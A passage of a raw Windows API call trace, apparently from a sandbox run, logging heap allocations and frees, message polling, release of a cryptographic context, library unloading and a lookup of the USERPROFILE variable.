(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.658] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0233.658] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.658] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0233.658] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0233.658] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0233.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.658] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0233.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.658] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.658] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.659] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0233.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.659] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0233.659] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0233.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.659] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0233.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0233.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0233.660] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0233.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.660] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0233.660] FreeLibrary (hLibModule=0x756e0000) returned 1 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.661] CloseHandle (hObject=0x2a0) returned 1 [0233.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0233.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0233.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0233.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0233.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0233.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0233.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0233.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0233.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.665] CloseHandle (hObject=0x2d0) returned 1 [0233.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0233.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0233.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0233.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0233.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0233.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0233.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0233.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0233.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0233.728] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0233.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0233.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0233.728] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0233.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0233.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0233.729] 